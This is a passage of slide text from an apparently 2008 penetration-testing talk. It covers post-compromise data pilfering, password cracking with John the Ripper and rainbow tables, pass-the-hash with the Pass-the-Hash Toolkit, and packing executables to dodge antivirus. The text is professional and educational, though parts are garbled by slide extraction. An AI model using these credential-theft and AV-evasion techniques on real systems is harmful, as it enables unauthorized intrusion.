  • 11. Tip 5) Pilfering Continued •  Additional items to snag: –  Source code •  Especially interesting for web servers… Locally, we can analyze it for vulnerabilities –  Wireless client profiles, including Pre-Shared Keys •  Detailed in Josh Wright’s December 2008 paper, “Vista Wireless Power Tools for the Penetration Tester” at www.inguardians.com •  PSK isn’t currently crackable, but can be directly imported into pen tester’s own system… Great idea, Josh! Pen Test Secrets - ©2008, All Rights Reserved 21 Tip 5) More Stuff to Pilfer •  Machines with which the compromised system has recently communicated: –  Windows: C:> netstat –na C:> arp –a C:> ipconfig /displaydns –  Linux: # netstat –natu # arp –a •  Additional system-specific information: –  DNS servers: Zone files –  Web servers: Document root, especially local scripts –  Mail servers: E-mail address inventory, address aliases, sample of e-mail that tester sent to it –  Clients: Inventory of software: c:> dir /s quot;c:Program Filesquot; –  Many more possibilities here Pen Test Secrets - ©2008, All Rights Reserved 22 11
  • 12. Tip 6) Optimizing John the Ripper No SSE2 •  The John the Ripper password cracker can be compiled to use specific No SSE2 processor instruction sets to improve performance –  MMX, Streaming Single SIMD Extensions 2 SSE2 (SSE2), 64-bit, PowerPC, etc. •  Depending on the SSE2 password algorithm, John may run two to five times faster when compiled using SSE2 on a modern Intel or AMD processor $ make linux-x86-sse2 Pen Test Secrets - ©2008, All Rights Reserved 23 Tip 6) But… I’m Too Late… john.rec is Your Friend •  I had a friend who was running John to crack some LANMAN (LM) passwords •  Cracking had been going for a day, with little success •  I asked if he had compiled John to use SSE2 •  He said “no” and didn’t want to stop John, re-compile, and then restart John, because he’d be wasting a day of password cracking already done •  But, hit CTRL-C once in John, and it will create a john.rec file, containing its current state •  Re-compile John for SSE2 (but don’t overwrite John’s run directory!) •  Invoke John (now with SSE2) again… it’ll pick up where it left off –  Must invoke it with: $ ./john --restore –  Don’t specify a password file… it uses the last one, with all of the same settings! •  And, you now could be running 100 to 400 percent faster Pen Test Secrets - ©2008, All Rights Reserved 24 12
  • 13. Tip 7) Use John or Rainbow Tables? •  Traditional password cracking cycle: Guess –  Guess, encrypt/hash, compare, repeat Encrypt –  Continue until password is cracked Compare •  Password cracking with Rainbow Tables: –  Hash/reduce to build many big chains, store only first and last password in chain Hash to Crack Stored Chain I Reduction –  Crack by re-inflating chains Initial password Password A End Password Hash Function –  Not a mere lookup – need to regen chain Hash A to crack a hash Stored Chain II Reduction Initial password –  Uses Time-Memory Trade-off… twice Password B End Password Hash Function –  Can crack some password Hash B Stored Chain III representations very fast (often <1 hr): Reduction Initial password Password C •  LANMAN and some NT hashes End Password Pen Test Secrets - ©2008, All Rights Reserved 25 Tip 7) John vs. RT: Differences in Speed •  Generally, Rainbow Tables will crack a password faster than traditional password cracking –  Some Rainbow Tables can get nearly any LANMAN password within an hour –  But NOT ALWAYS… •  It depends on many variables: where the hash is located in the given chain where it is represented (near top or bottom), how long it takes to get a collision with the proper chain, etc. •  Leads to weird results: –  A “simple” password may take 1 hour to determine in Rainbow Tables –  But, that same password may take 1 second to determine with traditional password cracking (consider a variation of the username as a password) •  You may even see LANMAN hashes where the first 7 char piece cracks faster in Rainbow Tables and the second 7 char piece cracks faster with John… –  You’ll definitely see that if you take SANS Security 560 Pen Test Secrets - ©2008, All Rights Reserved 26 13
  • 14. Tip 7) So, Which One? Answer: Both •  For LANMAN and NT hashes, always run both Rainbow Table cracking and traditional password cracking –  Don’t choose one over the other •  Same box? –  Ideally, use two different physical machines –  But, if two aren’t available, Rainbow Table tools usually will steal only a fraction of CPU horsepower from traditional password crackers, which suck up CPU a lot –  Thus, in a pinch, use one machine (dual core?) to run both tools… you will likely still get your answer more quickly Pen Test Secrets - ©2008, All Rights Reserved 27 Tip 8) Optimizing Pass the Hash •  Windows authentication to a domain or a server (LANMAN challenge/response, NTLMv1, NTLMv2) rely on the user’s hash, not the user’s password •  Thus, we can steal the hashes, and use them to authenticate •  Very powerful technique… works like a charm •  But, that’s not the tip… Steal Attacker Machine Hashes 1 2 Place Hash Target lsass.exe process Machine Logon Hash Session Array Access Target 3 Pen Test Secrets - ©2008, All Rights Reserved 28 14
  • 15. Tip 8) Optimizing Pass the Hash •  Pass-the-Hash Toolkit by Hernán Ochoa from Core Security –  Free at http://oss.coresecurity.com/projects/pshtoolkit.htm •  Modified SAMBA code from JoMo-kun of Foofus –  Free at http://www.foofus.net/jmk/passhash.html •  Both tools require both the LM and NT hashes as input –  But, what if you only have NT hashes? •  Why would you only have those? –  Perhaps the LM hashes got corrupted –  Perhaps your tool grabbed only NT hashes –  Perhaps the LM hashes weren’t there… passwords 15 or more characters don’t have a crackable LM hash •  So, are you doomed for pass the hash attacks? Pen Test Secrets - ©2008, All Rights Reserved 29 Tip 8) Resolving the Dilemma: A Closer Look at PSHTK •  Pass the Hash Toolkit (PSHTK) includes three parts: –  whosthere.exe: Dumps current user session information (including hashes) from lsass.exe –  genhash.exe: Generates LM and NT hash for given password –  iam.exe: Changes existing hashes in memory to chosen value •  Must provide it with username and domain name •  Those are needed for NTLMv2, but not LANMAN challenge/response or NTLMv1 •  Still, you always give those to PSHTK Pen Test Secrets - ©2008, All Rights Reserved 30 15
  • 16. Tip 8) No Doom… Just Use LM Hash of Padding •  Solution: If you have no LM hashes, in place of LM hash, enter the hash of padding –  Remember that old AAD3B4… for last 7 characters of a LM hash of password < 8 chars? •  But, what if you don’t remember that hash of padding? –  Use genhash.exe to create hash of quot;quot; –  Then, use iam.exe like this: Pen Test Secrets - ©2008, All Rights Reserved 31 Tip 8) Getting Hashes… But I Don’t Have Admin! •  To dump hashes, you need admin or SYSTEM privs, right? •  Well, yes, to dump all hashes from the box •  But, suppose you’ve exploited a process running as a non-admin account –  Browser exploit, SQL injection to invoke XP cmd shell on back-end database, etc. •  Can you still get the hashes for that user and do pass the hash as that account? •  Yes! Use whosthere.exe to get the hashes of the current user •  Bring the hashes to any other Windows or Linux machine you’d like, with PSHTK or Foofus-modified SAMBA client •  And then, pass the hash from that machine against targets •  On the surface, whosthere.exe doesn’t seem that useful… until you really really need it! Pen Test Secrets - ©2008, All Rights Reserved 32 16
  • 17. Tip 9) Modifying Tools to Dodge AV •  Many very useful tools are detected by Anti-Virus solutions –  AV prevents them from being executed –  May also trigger alert and get the penetration tester noticed too early in the test –  Netcat, John, PSHTK items (genhash, iam, whosthere), etc. •  How to evade AV tools? –  Shut them off… VERY DANGEROUS, and usually disallowed by Rules of Engagement or target system personnel –  Beware! The very useful fgdump temporarily disables AV tools •  According to fgdump helpfile, the –t option “…will test for presence of antivirus without actually running the password dumps” •  It’s not true! It does run the password dumps anyway –  Instead of shutting off AV tools, let’s modify executable so that it is far less likely to be detected, creating polymorphic equivalents Pen Test Secrets - ©2008, All Rights Reserved 33 Tip 9) Creating Polymorphic Equivalents to Dodge AV •  Many tools for packing / altering executables to evade AV •  LordPE by Yoda –  Good mods, but use Hex Editor to remove “LordPE” string near start of file to dodge AV •  UPX by Markus F.X.J. Oberhumer, Laszlo Molnar, & John F. Reiser –  http://upx.sourceforge.net –  Nice mods, but many AV tools can detect most compression options… –  -1 compress faster… -9 compress better… Option -2 seems best to dodge AV •  PE Scrambler by Nick Harbour –  First place winner of Race-to-Zero contest at Defcon 16 –  Was available at www.rnicrosoft.net –  Recently taken down –  This kind of thing happens a lot with this kind of tool •  You may want to write your own… or get to know one of the authors Pen Test Secrets - ©2008, All Rights Reserved 34 17
  • 18. Tip 10) Reporting Effectively •  Always write a report –  Even if you are on the in-house security team testing your own enterprise •  Focus your report on the business implications –  How could a bad guy damage the enterprise given the vulnerabilities? Paint a picture in terms of business risk –  Why are these things the way they are? –  How can we change the practices that resulted in these flaws? •  Not just applying an individual patch – but improving the patching process •  Not just tweaking this or that aspect of an application, but improving the development process Pen Test Secrets - ©2008, All Rights Reserved 35 Tip 10) More About Reporting •  Provide enough detail about your methodology and findings so that a technically solid pen tester could replicate your work •  Provide an action plan based on time –  Not necessarily the same as that based on risk –  Which items should be accomplished immediately (say, within a week) –  Which should be done within a month, a quarter, a half, and a year? –  Gives your report usefulness over the longer span Pen Test Secrets - ©2008, All Rights Reserved 36 18
  • 19. Conclusions •  Penetration testing tools are becoming more powerful –  Tracking along with the attacks of actual bad guys •  We must keep up, so that we can determine business risks associated with vulnerabilities •  Get to know each tool in depth, realizing its limitations and working creatively to bypass them •  Don’t think of your tools as just point and shoot •  Think of each tool as a means to accomplish a (usually rather limited) goal •  Think flexibly about how to apply each of these tools together in a structured attack •  Relentlessly pivot (within scope) •  And, always remember: The penetration test doesn’t end when you get shell –  That’s when things just start to get interesting! Pen Test Secrets - ©2008, All Rights Reserved 37 A Challenge For You •  I write hacker challenges… Little puzzles for security personnel –  Over 25 in total at www.counterhack.net •  Competitions to win prizes •  The latest challenge is available for you at www.ethicalhacker.net –  It’s penetration test related –  You must come up with strategy and tactics to rescue Kris Kringle •  “Santa Claus is Hacking To Town” Pen Test Secrets - ©2008, All Rights Reserved 38 19